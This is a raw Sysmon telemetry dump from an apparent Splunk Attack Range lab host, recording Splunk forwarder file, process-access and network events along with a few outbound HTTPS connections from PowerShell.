354300x800000000000000035127937Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:38.440{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62088-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035127940Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:15.672{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=49B3A923F4B3912891609E2DA6FE43EA,SHA256=594ED47D53DC3078A255E26B5BCDD7960BB48C524D6000A0BDED7342ECA79382,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127939Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:15.590{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127941Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:16.690{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=108FEBD9A459822BF60BF7151B6AAC3A,SHA256=7A0FAA6EF1907F513AEF3A0891031F5CEBD1157CAA45BE4EC273CC0D2AE18ADB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127943Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:17.709{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DAEA4C1D1466829E5F266A0918817B01,SHA256=518701E85A5C82155CA7C672BFF135BF8CA034AD3A2ABD2B3F9659C3C7B3D04F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127942Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:41.253{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62089-false10.0.1.12-8000- 23542300x800000000000000035127944Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:18.723{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB91B1CD8DE745C8768D7C687BCA4E43,SHA256=C12492365CDBECA13BBF4AB8986CF9385E67E10F6ADEBD9CEDA96F9D634F1AEC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127946Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:19.753{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A70A80768A14E1B82A7CFBAD04B158D4,SHA256=9273FEEF3D7A5A6E16575217A3A3BA70C3D123BDB2BC448D2EEAB9893DFAD8D0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127945Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:19.291{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=BD3CC94FBC88CBCD0F368696F812BA98,SHA256=C1F8ADA03756BE8CF2B96B488F3EE7EB967AF6919ECB21285294AC3E8DFACEB5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127948Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:20.768{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2225592EFE3F1333EC264751A3444514,SHA256=19D3FCB04AE699CC7F5961F428E694CD97B86E8E378A2866886795A1C8E3A07C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127947Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:44.452{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62090-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035127949Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:21.784{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D644276DE47B3516A663E8B6F19C359,SHA256=B6167099C81F2F0A96FAC41722026852BB8E6BF1405698AC109B93535326529A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127951Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:22.803{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3804AD684981A88BF390234755251411,SHA256=F1C32F69AFBD3A846BBE5393D6A25A5D58636C0A726DE42FB6F60C989645EC43,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127950Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:46.417{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62091-false10.0.1.12-8000- 23542300x800000000000000035127952Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:23.808{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E55698AE5D47F61141E674EC4D6D4D7,SHA256=86A21EE164C551554D69AA0E01922D220D38181A5541C63B0386C5F04AF04ECA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127953Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:24.809{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=92EF81D6E5895221A91533BB499D0556,SHA256=6CB4BA6E5B25B093C4D101D46DB3DB4C77B78ADAE5D3C3D36B85EC9DA15807A0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127956Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:25.840{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E2AFC7F68B0984ED1F28DAF86E6C0B6,SHA256=C9E37B455CD0D3BEF95FD0843913BEFC6A1D1619EDD3D1C0AF8697FEB996D149,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127955Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:50.452{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62092-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035127954Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:25.509{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=7E37100205CD5A672D0557C170D390F7,SHA256=975DD03609EC36D85371FFE891A1F524E7701CC1BDD4647B8673C762B0365521,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035127965Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:26.892{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-830A-613A-C296-03000000C801}6120C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035127964Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:26.892{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=41E24459982A186C0FA0F3FAC42D6D82,SHA256=B6950D7E3672F3004515E2152903E44312DCD9E5007892732C4832B9E8A3181D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035127963Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:26.890{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127962Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:26.890{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127961Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:26.890{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127960Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:26.889{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-830A-613A-C296-03000000C801}6120C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035127959Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:26.890{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127958Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:26.889{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-830A-613A-C296-03000000C801}6120C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035127957Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:26.872{B81B27B7-830A-613A-C296-03000000C801}6120C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035127978Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:27.907{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F4150A35A77BE0C3F75C3001DAC394E4,SHA256=C1C9168623814B5086335D35C16499AB24F8EE90134AA260E79473D10B2400E5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127977Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:27.890{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C19820AC4209C11FA8D053926EE9A8A4,SHA256=E1B2733DD488735EBD4F6184E897F91D6DCAC621BCAEE1821E429E143475321A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127976Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:27.889{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=70D5E5E45AE7CF181062C5AD671BB462,SHA256=B18A672631F928AC4CA5342B376C75609698F0F056F3E7A16A51DC932DABA5F0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127975Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:52.351{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62093-false10.0.1.12-8000- 10341000x800000000000000035127974Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:27.590{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-830B-613A-C396-03000000C801}2984C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127973Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:27.587{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127972Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:27.587{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127971Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:27.587{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127970Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:27.587{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127969Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:27.587{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-830B-613A-C396-03000000C801}2984C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035127968Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:27.586{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-830B-613A-C396-03000000C801}2984C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035127967Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:27.571{B81B27B7-830B-613A-C396-03000000C801}2984C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 